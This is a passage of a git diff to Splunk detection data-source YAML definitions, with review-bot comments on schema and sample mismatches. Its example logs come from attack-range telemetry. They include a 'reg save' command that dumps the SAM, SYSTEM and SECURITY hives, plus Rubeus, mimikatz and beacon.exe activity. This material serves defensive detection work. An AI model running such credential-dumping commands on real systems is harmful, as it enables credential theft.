+supported_TA:
+- name: Splunk Add-on for Okta Identity Cloud
+ url: https://splunkbase.splunk.com/app/6553
+ version: 2.2.0
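Review bot: This data source defines neither `fields` nor `example_log`, whereas every other data-source file in this change carries both, and the `separator` key used by the O365 files is absent too. If the contentctl data-source model treats `fields` as required, this file will fail validation; if it is optional, detections referencing the Okta source have no field list to validate against. At minimum an explicit `fields: []` with a comment such as `# TODO: populate from OktaIM2:log sample events` would make the omission deliberate rather than accidental.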
diff --git a/data_sources/endpoint/osquery.yml b/data_sources/osquery.yml
similarity index 96%
rename from data_sources/endpoint/osquery.yml
rename to data_sources/osquery.yml
index b889cc2860..8bcd9cdd79 100644
--- a/data_sources/endpoint/osquery.yml
+++ b/data_sources/osquery.yml
@@ -1,10 +1,13 @@
name: osquery
id: 7ec4d7c8-c1d0-423a-9169-261f6adb74c0
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for osquery
source: osquery
sourcetype: osquery:results
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
fields:
- _time
- calendarTime
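Review bot: `supported_TA:` followed by `- {}` produces a one-element list whose only entry is an empty mapping, while pingid.yml in the same change expresses "no add-on" as `supported_TA: []`; a consumer that reads `name`/`url`/`version` from each entry will see a nameless, versionless add-on here. Use the empty list form, `supported_TA: []`, so the two representations agree. The same `- {}` pattern appears in powershell_installed_iis_modules.yml.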
diff --git a/data_sources/network/Palo_Alto_Network_Threat.yml b/data_sources/palo_alto_network_threat.yml
similarity index 66%
rename from data_sources/network/Palo_Alto_Network_Threat.yml
rename to data_sources/palo_alto_network_threat.yml
index dd6bb5cf6b..13ba7cecd1 100644
--- a/data_sources/network/Palo_Alto_Network_Threat.yml
+++ b/data_sources/palo_alto_network_threat.yml
@@ -1,34 +1,35 @@
name: Palo Alto Network Threat
id: 375c2b0e-d216-41ad-9406-200464595209
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Palo Alto Network Threat
source: pan:threat
sourcetype: pan:threat
supported_TA:
- name: Palo Alto Networks Add-on for Splunk
- version: 8.1.1
+- name: Palo Alto Networks Add-on for Splunk
url: https://splunkbase.splunk.com/app/2757
-event_names: []
+ version: 8.1.1
fields:
- - _time
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - host
- - index
- - linecount
- - punct
- - source
- - sourcetype
- - splunk_server
- - timeendpos
- - timestartpos
-example_log:
- May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
+- _time
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- host
+- index
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
11:08:38,2.18.4.7,1.2.3.4,2.18.4.7,1.2.3.4,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,Zero,2022/05/10
11:08:38,1535535,1,32880,443,32880,20077,0x1403000,tcp,allow,"sr.example.com/mgmt/tm/util/bash",(9999),allow-URL,informational,client-to-server,7081856864553612091,0xa000000000000000,United
States,United States,0,,0,,,1,"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36
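Review bot: `example_log:` is now a multi-line plain scalar, so the line breaks after `2022/05/10`, `Zero,2022/05/10` and `United` are folded to single spaces implicitly, and a future continuation line that starts with an indicator (`-`, `#`, `"`) or contains `: ` would change the parse rather than the value. Writing it as a folded block, `example_log: >-` with the continuation lines indented beneath it, makes the folding explicit and keeps the embedded quotes and commas inert. palo_alto_network_traffic.yml has the same shape.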
diff --git a/data_sources/network/Palo_Alto_Network_Traffic.yml b/data_sources/palo_alto_network_traffic.yml
similarity index 63%
rename from data_sources/network/Palo_Alto_Network_Traffic.yml
rename to data_sources/palo_alto_network_traffic.yml
index ee442a5592..773e2b1afa 100644
--- a/data_sources/network/Palo_Alto_Network_Traffic.yml
+++ b/data_sources/palo_alto_network_traffic.yml
@@ -1,34 +1,35 @@
name: Palo Alto Network Traffic
id: 182a83bc-c31a-4817-8c7a-263744cec52a
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Palo Alto Network Traffic
source: screenconnect_palo_traffic
sourcetype: pan:traffic
supported_TA:
- name: Palo Alto Networks Add-on for Splunk
- version: 8.1.1
+- name: Palo Alto Networks Add-on for Splunk
url: https://splunkbase.splunk.com/app/2757
-event_names: []
+ version: 8.1.1
fields:
- - _time
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - host
- - index
- - linecount
- - punct
- - source
- - sourcetype
- - splunk_server
- - timeendpos
- - timestartpos
-example_log:
- 577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
+- _time
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- host
+- index
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: 577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
1,2024/02/22 12:33:50,012801036556,TRAFFIC,end,2305,2024/02/22 12:33:50,192.168.1.205,147.28.146.44,201.17.96.104,147.28.146.44,No_Vuln_Filtering_OUT,,,screenconnect,vsys1,Trust,Untrust,ethernet1/2,ethernet1/1,splunk_range,2024/02/22
12:33:50,14740,1,50624,443,11024,443,0x40005e,tcp,allow,7419,6609,810,25,2024/02/22
12:32:29,65,any,0,376156893,0x0,192.168.0.0-192.168.255.255,United States,0,14,11,tcp-fin,0,0,0,0,,PALO220,from-policy,,,0,,0,,N/A,0,0,0,0,0862e58b-4a54-436b-b3ac-ea3eccf8403b,0,0,,,,,,,
diff --git a/data_sources/pingid.yml b/data_sources/pingid.yml
new file mode 100644
index 0000000000..1342a8c5d5
--- /dev/null
+++ b/data_sources/pingid.yml
@@ -0,0 +1,39 @@
+name: PingID
+id: 17890675-61c1-40bd-a88e-6a8e9e246b43
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for PingID
+source: XmlWinEventLog:Security
+sourcetype: XmlWinEventLog
+supported_TA: []
+fields:
+- _time
+- actors{}.name
+- actors{}.type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- extracted_source
+- host
+- id
+- index
+- linecount
+- punct
+- recorded
+- resources{}.ipaddress
+- resources{}.websession
+- result.message
+- result.status
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: '{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
+ Paired SMS \"Mobile 1\""}}'
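Review bot: `source: XmlWinEventLog:Security` and `sourcetype: XmlWinEventLog` describe the Windows Security event log, but the `example_log` is a PingID JSON audit record (`"source":"PINGID"`) and the listed fields (`actors{}.name`, `resources{}.ipaddress`, `result.status`) are JSON paths from that record, so the metadata does not match the sample. These values were carried over from the deleted data_sources/application/PingID.yml, so the mismatch predates this change, but the rewrite is the natural point to fix it. If the PingID sourcetype used in the repository's attack data is known, set it here; otherwise a comment such as `# TODO: source/sourcetype do not match the PingID JSON sample below` flags it for follow-up.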
diff --git a/data_sources/endpoint/Powershell_Installed_IIS_Modules.yml b/data_sources/powershell_installed_iis_modules.yml
similarity index 76%
rename from data_sources/endpoint/Powershell_Installed_IIS_Modules.yml
rename to data_sources/powershell_installed_iis_modules.yml
index 6f55783abd..663658c8a6 100644
--- a/data_sources/endpoint/Powershell_Installed_IIS_Modules.yml
+++ b/data_sources/powershell_installed_iis_modules.yml
@@ -1,10 +1,13 @@
name: Powershell Installed IIS Modules
id: 4f2ccf42-3503-4417-a684-bfccf7f0d7b4
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Powershell Installed IIS Modules
source: powershell://AppCmdModules
sourcetype: Pwsh:InstalledIISModules
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
fields:
- _time
- Schema
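Review bot: `supported_TA:` followed by `- {}` on the new side produces a list containing one empty mapping rather than "no supported add-on", which is inconsistent with `supported_TA: []` used by the new `pingid.yml` in this commit and will likely fail any schema that requires `name`, `url` and `version` on each entry; replace the two lines with `supported_TA: []`. The remainder of the file (the rest of `fields`) is outside this hunk.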
diff --git a/data_sources/endpoint/Powershell_Script_Block_Logging_4104.yml b/data_sources/powershell_script_block_logging_4104.yml
similarity index 77%
rename from data_sources/endpoint/Powershell_Script_Block_Logging_4104.yml
rename to data_sources/powershell_script_block_logging_4104.yml
index 8247f45510..7e31c1dbbc 100644
--- a/data_sources/endpoint/Powershell_Script_Block_Logging_4104.yml
+++ b/data_sources/powershell_script_block_logging_4104.yml
@@ -1,13 +1,15 @@
name: Powershell Script Block Logging 4104
id: 5cfd0c72-d989-47a0-92f9-6edc6f8d3564
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Powershell Script Block Logging 4104
source: XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
sourcetype: xmlwineventlog
supported_TA:
- name: Splunk Add-on for Microsoft Windows
- version: 8.8.0
+- name: Splunk Add-on for Microsoft Windows
url: https://splunkbase.splunk.com/app/742
-event_names: []
+ version: 8.8.0
fields:
- _time
- ActivityID
@@ -62,22 +64,6 @@ fields:
- timestartpos
- user_id
- vendor_product
-field_mappings:
- - data_model: cim
- data_set: Endpoint.Processes
- mapping:
- Computer: Processes.dest
- Path: Processes.process_path
- ScriptBlockId: Processes.process_id
- ScriptBlockText: Processes.process
- UserID: Processes.user_id
- - data_model: ocsf
- mapping:
- Computer: device.hostname
- Path: process.file.path
- ScriptBlockId: process.uid
- ScriptBlockText: process.cmd_line
- UserID: actor.user.uid
example_log: 4104152150x0112748154100x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-6764986.attackrange.local-2020-10-08\
+ \ 11:03:46.615{96128EA2-F212-5F7E-E400-000000007F01}2296C:\\Windows\\System32\\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows\
+ \ Command ProcessorMicrosoft\xAE Windows\xAE Operating\
+ \ SystemMicrosoft CorporationCmd.Exe\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam\
+ \ %%temp%%\\sam & reg save HKLM\\system %%temp%%\\system & reg save HKLM\\\
+ security %%temp%%\\security\" C:\\Users\\ADMINI~1\\\
+ AppData\\Local\\Temp\\ATTACKRANGE\\Administrator{96128EA2-F210-5F7E-ACD4-080000000000}0x8d4ac0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{96128EA2-F211-5F7E-DF00-000000007F01}4624C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"powershell.exe\" -noninteractive -encodedcommand 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"
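Review bot: The `example_log` value on the new side looks like a Sysmon process-creation record from the `Microsoft-Windows-Sysmon/Operational` channel (image path, MD5/SHA256/IMPHASH hashes, integrity level, parent process and parent command line) rather than a PowerShell 4104 script block event, so it will not exercise the fields this data source declares; a genuine 4104 sample should be substituted. The scalar also ends with a closing `"` and uses `\"` escapes while no opening quote is visible on the `example_log:` line in this view, so confirm the file still loads as a single string after the change. The start of the `fields` list and the rest of the file are outside this hunk.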
diff --git a/data_sources/sysmon_eventid_10.yml b/data_sources/sysmon_eventid_10.yml
new file mode 100644
index 0000000000..bef6271097
--- /dev/null
+++ b/data_sources/sysmon_eventid_10.yml
@@ -0,0 +1,102 @@
+name: Sysmon EventID 10
+id: 659cd5a8-148a-4c59-ade1-05f41ac1b096
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 10
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- CallTrace
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- GrantedAccess
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SourceImage
+- SourceProcessGUID
+- SourceProcessId
+- SourceThreadId
+- SystemTime
+- System_Props_Xml
+- TargetImage
+- TargetProcessGUID
+- TargetProcessId
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- granted_access
+- host
+- id
+- index
+- linecount
+- os
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 10341000x8000000000000000150624412Microsoft-Windows-Sysmon/Operationalwin-dc-128.attackrange.local-2022-02-01
+ 21:01:44.670{3BF36828-9F6D-61F9-390A-02000000CF01}1272956C:\Tools\Rubeus.exe{3BF36828-4B37-61E8-0900-00000000CF01}572C:\Windows\system32\winlogon.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c01f5|UNKNOWN(00007FFD8E245F0C)
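Review bot: `description: Data source object for Sysmon EventID 10` only restates `name` and tells a reader nothing about the event; the description should name the Sysmon event type and what the declared fields carry, e.g. `description: Sysmon EventID 10 (ProcessAccess) - one process opening a handle to another; GrantedAccess, CallTrace, SourceImage and TargetImage describe the access.` The same boilerplate description appears in every other new `sysmon_eventid_*.yml` file in this commit and in `pingid.yml`, and the same fix applies to each of them.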
diff --git a/data_sources/sysmon_eventid_11.yml b/data_sources/sysmon_eventid_11.yml
new file mode 100644
index 0000000000..bb79434a86
--- /dev/null
+++ b/data_sources/sysmon_eventid_11.yml
@@ -0,0 +1,102 @@
+name: Sysmon EventID 11
+id: f3db9179-f4f5-416d-bc03-39f4d4ff699e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 11
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- CreationUtcTime
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- file_create_time
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- object_category
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+field_mappings:
+- data_model: cim
+ data_set: Endpoint.Filesystem
+ mapping:
+ Computer: Filesystem.dest
+ ProcessGuid: Filesystem.process_guid
+ ProcessId: Filesystem.process_id
+ TargetFilename: Filesystem.file_path
+example_log: 11241100x80000000000000007712490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-84.attackrange.localDownloads2023-02-08 13:01:11.053{0F9A6540-A70E-63E2-3091-00000000BD02}9332C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exeC:\Users\Administrator\Downloads\mimikatz_trunk\x64\CURRENT_USER_My_4_atomic@art2.local.pfx2023-02-08 13:01:11.053
diff --git a/data_sources/sysmon_eventid_12.yml b/data_sources/sysmon_eventid_12.yml
new file mode 100644
index 0000000000..87f7af49cd
--- /dev/null
+++ b/data_sources/sysmon_eventid_12.yml
@@ -0,0 +1,96 @@
+name: Sysmon EventID 12
+id: 3ef28798-8eaa-4fd2-b074-6f36d08a1b33
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 12
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetObject
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object_category
+- object_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- registry_hive
+- registry_key_name
+- registry_path
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 12241200x80000000000000001055579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:10:32.592{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command
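Review bot: This file declares the same registry fields as the new `sysmon_eventid_13.yml` (`TargetObject`, `ProcessGuid`, `ProcessId`, `registry_path`, `registry_key_name`) but has no `field_mappings` stanza, whereas the EventID 13 file maps those fields to `Endpoint.Registry`; if the CIM mapping is meant to cover registry key events as well, this file should carry the same block minus the `Details` entry, which EventID 12 does not declare. Whether the omission is deliberate cannot be told from the diff alone, so this may warrant a comment rather than a change.
```yaml
# … unchanged: name … fields … vendor_product …
field_mappings:
- data_model: cim
  data_set: Endpoint.Registry
  mapping:
    Computer: Registry.dest
    ProcessGuid: Registry.process_guid
    ProcessId: Registry.process_id
    TargetObject: Registry.registry_path
# … unchanged: example_log …
```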
diff --git a/data_sources/sysmon_eventid_13.yml b/data_sources/sysmon_eventid_13.yml
new file mode 100644
index 0000000000..ae37b20a13
--- /dev/null
+++ b/data_sources/sysmon_eventid_13.yml
@@ -0,0 +1,113 @@
+name: Sysmon EventID 13
+id: 19cd00ee-f65f-48ca-bb08-64aac28638ce
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 13
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Details
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RegistryValueData
+- RegistryValueType
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetObject
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object_category
+- object_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- registry_hive
+- registry_key_name
+- registry_path
+- registry_value_data
+- registry_value_name
+- registry_value_type
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- status
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+field_mappings:
+- data_model: cim
+ data_set: Endpoint.Registry
+ mapping:
+ Computer: Registry.dest
+ ProcessGuid: Registry.process_guid
+ ProcessId: Registry.process_id
+ TargetObject: Registry.registry_path
+ Details: Registry.registry_value_data
+example_log: 13241300x8000000000000000810987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0xd724b8c5)
diff --git a/data_sources/sysmon_eventid_15.yml b/data_sources/sysmon_eventid_15.yml
new file mode 100644
index 0000000000..2a2740c8d3
--- /dev/null
+++ b/data_sources/sysmon_eventid_15.yml
@@ -0,0 +1,101 @@
+name: Sysmon EventID 15
+id: 95785e02-93b4-47e2-81f1-be326295348e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 15
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Contents
+- CreationUtcTime
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Hash
+- IMPHASH
+- Image
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- file_create_time
+- file_hash
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- os
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 15241500x8000000000000000667860Microsoft-Windows-Sysmon/Operationalproject-mumbai-host-2021-04-28
+ 20:11:34.709{ED2ECF8A-C154-6089-F967-00000000BB01}7000C:\Users\DefaultAccount\AppData\Roaming\Telegram
+ Desktop\Telegram.exeC:\Users\DefaultAccount\Downloads\Telegram
+ Desktop\Good(NLA).txt:Zone.Identifier2021-04-28
+ 20:11:33.238MD5=C785C55D5FA3443A11B8417209C4B524,SHA256=D07777E0DC36EBECCE3FA9644F0F44DC4A0B7EDE0CBC1F5D33E8D6CB07AF5B5C,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3
diff --git a/data_sources/sysmon_eventid_17.yml b/data_sources/sysmon_eventid_17.yml
new file mode 100644
index 0000000000..7157b87ee5
--- /dev/null
+++ b/data_sources/sysmon_eventid_17.yml
@@ -0,0 +1,91 @@
+name: Sysmon EventID 17
+id: 08924246-c8e8-4c95-a9fc-633c43cc82df
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 17
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- PipeName
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- pipe_name
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 17141700x8000000000000000162168Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-CreatePipe2021-04-19 21:00:18.288{761B69BB-EF62-607D-B211-00000000BA01}6960\MSSE-1516-serverC:\Users\Administrator\Desktop\beacon.exe
diff --git a/data_sources/sysmon_eventid_18.yml b/data_sources/sysmon_eventid_18.yml
new file mode 100644
index 0000000000..411884fad5
--- /dev/null
+++ b/data_sources/sysmon_eventid_18.yml
@@ -0,0 +1,91 @@
+name: Sysmon EventID 18
+id: 37eb3554-214e-4e66-af10-c3ffc5b8ca82
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 18
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- PipeName
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- pipe_name
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 18141800x8000000000000000162173Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-ConnectPipe2021-04-19 21:00:19.312{761B69BB-EF62-607D-B211-00000000BA01}6960\MSSE-1516-serverC:\Users\Administrator\Desktop\beacon.exe
diff --git a/data_sources/sysmon_eventid_20.yml b/data_sources/sysmon_eventid_20.yml
new file mode 100644
index 0000000000..f90ebcd91c
--- /dev/null
+++ b/data_sources/sysmon_eventid_20.yml
@@ -0,0 +1,94 @@
+name: Sysmon EventID 20
+id: aeee5374-3203-4286-b744-a8cc4ad1cd7e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 20
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Destination
+- DestinationNoQuotes
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- Operation
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- Type
+- User
+- UserID
+- UtcTime
